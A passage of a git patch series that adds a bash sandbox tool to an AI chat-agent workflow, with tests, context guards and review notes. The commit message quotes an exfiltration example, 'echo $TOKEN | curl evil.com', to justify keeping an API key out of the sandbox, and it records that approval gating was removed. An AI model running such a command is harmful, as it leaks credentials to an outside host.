+ */ +export async function updateChat( + filter: UpdateChatFilter, + updates: ChatMutableFields, +): Promise { + // Split the optional `where` map into nullable vs equality predicates so we + // can apply each as a single chained call (`.match()` for equalities, + // `.is(col, null)` per nullable). Iterating with `let query = ...` and + // reassigning in a for-loop confuses Supabase's deeply generic builder + // types ("type instantiation is excessively deep") in the Next.js build. + const entries = Object.entries(filter.where ?? {}); + const equalityMatches: Record = {}; + const nullColumns: string[] = []; + for (const [column, value] of entries) { + if (value === null) { + nullColumns.push(column); + } else { + equalityMatches[column] = value; + } + } + + const baseQuery = supabase + .from("chats") + .update(updates) + .eq("id", filter.id) + .match(equalityMatches); + const finalQuery = nullColumns.reduce( + (q, column) => q.is(column, null) as typeof baseQuery, + baseQuery, + ); + + const { data, error } = await finalQuery.select(); + if (error) { + console.error("[updateChat] error:", error); + return { ok: false, error: error.message }; + } + + return { + ok: true, + rowsUpdated: data?.length ?? 0, + row: data?.[0] ?? null, + }; +} From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 13:12:07 -0500 Subject: [PATCH 3/5] feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. 
The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. 
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. 
Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 34 ++-- app/lib/workflows/runAgentWorkflow.ts | 32 ++-- lib/agent/__tests__/buildAgentTools.test.ts | 17 ++ lib/agent/buildAgentTools.ts | 20 +++ lib/agent/tools/AgentContext.ts | 34 ++++ lib/agent/tools/__tests__/bashTool.test.ts | 158 ++++++++++++++++++ .../__tests__/buildRecoupExecEnv.test.ts | 31 ++++ lib/agent/tools/__tests__/getSandbox.test.ts | 39 +++++ .../tools/__tests__/isAgentContext.test.ts | 42 +++++ lib/agent/tools/bashTool.ts | 116 +++++++++++++ lib/agent/tools/buildRecoupExecEnv.ts | 30 ++++ lib/agent/tools/getSandbox.ts | 28 ++++ lib/agent/tools/isAgentContext.ts | 26 +++ lib/agents/generalAgent/getGeneralAgent.ts | 5 +- lib/chat/const.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 20 +++ 16 files changed, 615 insertions(+), 30 deletions(-) create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts create mode 100644 lib/agent/buildAgentTools.ts create mode 100644 lib/agent/tools/AgentContext.ts create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts 
create mode 100644 lib/agent/tools/bashTool.ts create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts create mode 100644 lib/agent/tools/getSandbox.ts create mode 100644 lib/agent/tools/isAgentContext.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 352dcd265..f9a894195 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -1,27 +1,36 @@ import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; +import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentStepInput = { messages: UIMessage[]; modelId: string; writable: WritableStream; + /** + * Threaded into `streamText`'s `experimental_context` so each tool's + * `execute` callback can read the sandbox state + per-prompt context. + */ + agentContext: AgentContext; }; /** - * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow - * `"use step"` so that: + * One LLM turn (with internal tool-call iteration) in the chat workflow. + * Runs as a Vercel Workflow `"use step"` so: * * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. * - The result is cached as a single durable event — replays after a crash - * do not re-bill the model. + * do not re-bill the model or re-execute tools. * - * Currently emits a plain text response with no tools. Sandbox tools land in - * the follow-up PR (port `@open-harness/agent` tools + wire via - * `experimental_context`). + * `streamText` drives the tool-call → tool-result → next-LLM-call loop + * internally until the shared `CHAT_AGENT_STOP_WHEN` condition is met.
Our outer workflow stays + * single-turn for now — multi-turn message threading lands when the rest + * of the tool surface ports in a follow-up PR. * - * @param input - Messages + selected model + the workflow's writable stream. - * @returns finishReason from the model run (for the workflow loop's break condition). + * @param input - Messages + selected model + writable stream + agent context. + * @returns finishReason from the model run. */ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { "use step"; @@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe console.log("[runAgentStep] start", { modelId: input.modelId, messageCount: input.messages.length, + hasSandboxState: Boolean(input.agentContext.sandbox?.state), }); const modelMessages = convertToModelMessages(input.messages); + const tools = buildAgentTools(); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, messages: modelMessages, + tools, + stopWhen: CHAT_AGENT_STOP_WHEN, + experimental_context: input.agentContext, }); - // Acquire the writer once and release in `finally` — re-acquiring per chunk - // (the previous shape) leaked the lock when any write threw. + // Acquire the writer once and release in `finally` so a thrown chunk + // doesn't leak the lock. 
const writer = input.writable.getWriter(); try { for await (const part of result.toUIMessageStream()) { diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts index db679145a..ce65b0bb3 100644 --- a/app/lib/workflows/runAgentWorkflow.ts +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -1,12 +1,18 @@ import { getWritable } from "workflow"; import type { UIMessage, UIMessageChunk } from "ai"; import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentWorkflowInput = { messages: UIMessage[]; chatId: string; sessionId: string; modelId: string; + /** + * Threaded into `streamText`'s `experimental_context` so tools (bash et al.) + * can read sandbox state + the optional Recoup org id. + */ + agentContext: AgentContext; }; /** @@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = { * client; this function writes UIMessage chunks into the workflow's writable * via `runAgentStep`. * - * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is - * unsafe today: each iteration would re-send the original prompt without - * the assistant's tool-call response in scope, so a `tool-calls` finish - * reason would loop forever on the same input. The proper multi-turn - * shape (where the step appends its response to `messages` before the - * next iteration) lands with the sandbox-tool port in PR 4. - * - * Until then, if the model returns `tool-calls` we log a warning and exit - * — the client receives the partial tool-call chunks but no follow-up turn. + * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (bounded by + * CHAT_AGENT_STOP_WHEN) happens INSIDE `streamText` via `stopWhen` — so the + * single workflow turn covers the full "user → assistant → tool → tool + * result → assistant" cycle without our outer loop having to thread + * messages between iterations.
* * WDK constraints honored: - * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions. * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. */ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { @@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { + it("returns a tools record keyed by tool name", () => { + const tools = buildAgentTools(); + expect(tools).toHaveProperty("bash"); + expect(typeof tools.bash).toBe("object"); + }); + + it("each tool has an inputSchema, description, and execute", () => { + const tools = buildAgentTools(); + expect(tools.bash.inputSchema).toBeDefined(); + expect(tools.bash.description).toBeDefined(); + expect(typeof tools.bash.execute).toBe("function"); + }); +}); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts new file mode 100644 index 000000000..be6bde085 --- /dev/null +++ b/lib/agent/buildAgentTools.ts @@ -0,0 +1,20 @@ +import { bashTool } from "@/lib/agent/tools/bashTool"; + +/** + * Factory for the full agent tool set passed into `streamText({ tools })`. + * Each tool reads its sandbox handle + recoup creds from `experimental_context` + * at execute time — the factory takes no arguments because the tools are + * stateless modulo that context. + * + * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, + * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, + * `fetch`) port in follow-up PRs and slot into this record one-by-one + * without changing the factory signature. 
+ */ +export function buildAgentTools() { + return { + bash: bashTool(), + }; +} + +export type AgentTools = ReturnType; diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts new file mode 100644 index 000000000..63d2a1b7e --- /dev/null +++ b/lib/agent/tools/AgentContext.ts @@ -0,0 +1,34 @@ +import type { VercelState } from "@/lib/sandbox/vercel/state"; + +/** + * Per-tool-call context threaded into the agent via `streamText`'s + * `experimental_context`. Mirrors the open-agents `AgentContext` shape + * (subset — slim PR 4 ports only the `bash` tool, so context only needs + * what `bash` reads). + * + * Why no `recoupAccessToken` field? A short-lived per-prompt credential + * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call + * back to recoup-api as the caller. We deliberately omit it here — the + * legacy api-key path is too long-lived to expose inside a sandbox where + * model-issued bash commands can read env. Proper short-lived token + * minting lands alongside the `skill` tool port. + */ +export type AgentContext = { + /** + * Persistable sandbox state. Tools reconnect via `connectVercel(state)` — + * we never pass a live `Sandbox` instance through context because + * workflow durability requires replay-friendly inputs. + */ + sandbox: { + state: VercelState; + workingDirectory: string; + currentBranch?: string; + }; + /** + * Organization UUID when the sandbox was opened against a recoupable + * org repo (`org--`). Forwarded to sandboxed commands as + * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org. + * Public information — no security risk in exposing. 
+ */ + recoupOrgId?: string; +}; diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts new file mode 100644 index 000000000..da9a999d3 --- /dev/null +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -0,0 +1,158 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { bashTool } from "@/lib/agent/tools/bashTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseContext = { + sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(overrides: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + exec: vi.fn(), + execDetached: vi.fn(), + ...overrides, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("bashTool.execute", () => { + it("executes a command via sandbox.exec in the sandbox's working directory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = await tool.execute!({ command: "ls" }, { + experimental_context: baseContext, + } as never); + expect(result).toEqual({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + }); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono", + expect.any(Number), + expect.any(Object), + ); + }); + + it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "lots of output", + stderr: "", + truncated: true, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = 
bashTool(); + const result = (await tool.execute!({ command: "find ." }, { + experimental_context: baseContext, + } as never)) as { truncated?: boolean }; + expect(result.truncated).toBe(true); + }); + + it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "ls", cwd: "apps/web" }, { + experimental_context: baseContext, + } as never); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono/apps/web", + expect.any(Number), + expect.any(Object), + ); + }); + + it("injects RECOUP_ORG_ID into the exec env when present in context", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "curl example.com" }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record }; + expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("returns the detached commandId when called with detached:true", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stdout: string }; + expect(result.success).toBe(true); + expect(result.stdout).toMatch(/cmd-123/); + 
expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono"); + }); + + it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => { + const sandbox = makeSandbox({ execDetached: undefined }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stderr: string }; + expect(result.success).toBe(false); + expect(result.stderr).toMatch(/detached mode is not supported/i); + }); + + it("does NOT inject env vars on detached execs", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + // execDetached signature is (command, cwd) — no env arg. 
+ expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2); + }); +}); diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts new file mode 100644 index 000000000..3422fd662 --- /dev/null +++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; + +const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }; + +describe("buildRecoupExecEnv", () => { + it("returns undefined when no context", () => { + expect(buildRecoupExecEnv(undefined)).toBeUndefined(); + expect(buildRecoupExecEnv(null)).toBeUndefined(); + expect(buildRecoupExecEnv("not-a-context")).toBeUndefined(); + }); + + it("returns undefined when context has no recoupOrgId", () => { + expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined(); + }); + + it("injects RECOUP_ORG_ID when present in context", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" }); + expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("ignores empty-string recoupOrgId", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" }); + expect(env).toBeUndefined(); + }); + + it("returns undefined when the input is not a valid AgentContext shape", () => { + expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined(); + expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined(); + }); +}); diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts new file mode 100644 index 000000000..a14122f81 --- /dev/null +++ b/lib/agent/tools/__tests__/getSandbox.test.ts @@ -0,0 +1,39 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { connectVercel } from 
"@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("getSandbox", () => { + it("reconnects via connectVercel(state) and returns the sandbox", async () => { + const fakeSandbox = { workingDirectory: "/sandbox/mono" }; + vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never); + const state = { sandboxName: "session-xyz" }; + const result = await getSandbox( + { sandbox: { state, workingDirectory: "/sandbox/mono" } }, + "bash", + ); + expect(result).toBe(fakeSandbox); + expect(connectVercel).toHaveBeenCalledWith(state); + }); + + it("throws a descriptive error when context is missing entirely", async () => { + await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.state is missing", async () => { + await expect( + getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => { + await expect( + getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); +}); diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts new file mode 100644 index 000000000..29ad4f29d --- /dev/null +++ b/lib/agent/tools/__tests__/isAgentContext.test.ts @@ -0,0 +1,42 @@ +import { describe, it, expect } from "vitest"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +describe("isAgentContext", () => { + it("returns true for a well-formed context", () => { + expect( + isAgentContext({ + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, + }), + ).toBe(true); + }); + + it("returns false for non-object inputs", () => { + expect(isAgentContext(undefined)).toBe(false); 
+ expect(isAgentContext(null)).toBe(false); + expect(isAgentContext("nope")).toBe(false); + expect(isAgentContext(42)).toBe(false); + }); + + it("returns false when sandbox is missing", () => { + expect(isAgentContext({})).toBe(false); + }); + + it("returns false when sandbox is null", () => { + expect(isAgentContext({ sandbox: null })).toBe(false); + }); + + it("returns false when sandbox is empty (missing state and workingDirectory)", () => { + expect(isAgentContext({ sandbox: {} })).toBe(false); + }); + + it("returns false when sandbox.state is missing or null", () => { + expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false); + expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false); + }); + + it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => { + expect(isAgentContext({ sandbox: { state: {} } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts new file mode 100644 index 000000000..908113812 --- /dev/null +++ b/lib/agent/tools/bashTool.ts @@ -0,0 +1,116 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; + +const TIMEOUT_MS = 120_000; + +const bashInputSchema = z.object({ + command: z.string().describe("The bash command to execute"), + cwd: z + .string() + .optional() + .describe("Workspace-relative working directory for the command (e.g., apps/web)"), + detached: z + .boolean() + .optional() + .describe( + "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). 
The command starts and returns immediately without waiting for it to finish.", + ), +}); + +/** + * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside + * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's + * working directory. + * + * Approval gating is intentionally absent — model-issued commands are + * trusted in this PR. Add a host-side gate at the route/UI layer if that + * changes. + * + * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the + * sandbox is org-scoped) so future `recoup-api` skill calls can scope to + * the right org. Detached execs deliberately skip env injection — those + * processes outlive the prompt. + */ +export const bashTool = () => + tool({ + description: `Execute a bash command in the user's shell (non-interactive). + +WHEN TO USE: +- Running existing project commands (build, test, lint, typecheck) +- Using read-only CLI tools (git status, git diff, ls, etc.) +- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task + +WHEN NOT TO USE: +- Reading files (use the file read tool instead, once available) +- Editing or creating files (use file edit/write tools, once available) +- Searching code or text (use grep / glob tools, once available) +- Interactive commands (shells, editors, REPLs) + +USAGE: +- Runs bash -c "" in a non-interactive shell (no TTY/PTY) +- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&" +- Use the cwd parameter ONLY with a workspace-relative subdirectory +- Commands automatically timeout after ~2 minutes +- Combined stdout/stderr output is truncated after ~50,000 characters + +IMPORTANT: +- Never chain commands with ';' or '&&' — use separate tool calls +- Never use interactive commands (vim, nano, top, bash, ssh, etc.) 
+- Always quote file paths that may contain spaces +- Use detached: true to start dev servers / long-running processes in the background`, + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; + + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", + }; + } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } + + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? 
{ env: recoupEnv } : {}), + }); + + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, + }); diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts new file mode 100644 index 000000000..6eaf3015f --- /dev/null +++ b/lib/agent/tools/buildRecoupExecEnv.ts @@ -0,0 +1,30 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Build a per-invocation env override carrying Recoupable sandbox context + * so outbound shell commands (curl, scripts, the `recoup-api` skill) can + * scope requests correctly without any state persisting on the sandbox. + * + * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token + * injection is deliberately NOT included here; a long-lived api key in the + * sandbox env would be readable by any model-issued bash command. Proper + * short-lived token minting will land alongside the `skill` tool port + * (when there's an actual consumer for it). + * + * Returns `undefined` when nothing is available to inject so callers can + * cleanly spread a conditional `...(env ? { env } : {})` into exec opts. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + */ +export function buildRecoupExecEnv( + experimental_context: unknown, +): Record | undefined { + if (!isAgentContext(experimental_context)) return undefined; + + const env: Record = {}; + if (experimental_context.recoupOrgId) { + env.RECOUP_ORG_ID = experimental_context.recoupOrgId; + } + + return Object.keys(env).length > 0 ? 
env : undefined; +} diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts new file mode 100644 index 000000000..be6c46605 --- /dev/null +++ b/lib/agent/tools/getSandbox.ts @@ -0,0 +1,28 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve a connected `Sandbox` instance from `experimental_context`. + * Reconnects each call via `connectVercel(state)` rather than caching the + * handle on context — workflow durability requires that side-effecting + * resources (sandbox sessions) be re-acquired inside the step that uses + * them, not passed across event boundaries. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + * @param toolName - Optional tool name to surface in error messages. + */ +export async function getSandbox( + experimental_context: unknown, + toolName?: string, +): Promise { + if (!isAgentContext(experimental_context)) { + const where = toolName ? ` (tool: ${toolName})` : ""; + throw new Error( + `Sandbox state missing from agent context${where}. ` + + "Ensure the workflow start payload includes `sandbox.state` and that " + + "runAgentStep threads it via experimental_context.", + ); + } + return connectVercel(experimental_context.sandbox.state); +} diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts new file mode 100644 index 000000000..0049ac010 --- /dev/null +++ b/lib/agent/tools/isAgentContext.ts @@ -0,0 +1,26 @@ +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; + +/** + * Type-guard that confirms an arbitrary `experimental_context` shape has + * the AgentContext fields tools rely on at runtime. 
Validates each required + * leaf (sandbox object, state object, non-empty workingDirectory) so callers + * can trust the narrowed type — earlier weaker guards returned true for + * `{ sandbox: null }` or `{ sandbox: {} }`, letting tools later crash on + * "cannot read .x of undefined". + * + * @param value - The opaque context object passed by AI SDK to tool execute. + */ +export function isAgentContext(value: unknown): value is AgentContext { + if (typeof value !== "object" || value === null) return false; + + const candidate = value as { sandbox?: unknown }; + const sandbox = candidate.sandbox; + if (typeof sandbox !== "object" || sandbox === null) return false; + + const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown }; + if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false; + if (typeof sandboxFields.workingDirectory !== "string") return false; + if (sandboxFields.workingDirectory.length === 0) return false; + + return true; +} diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts index 7c2c9407b..e4bc4fc56 100644 --- 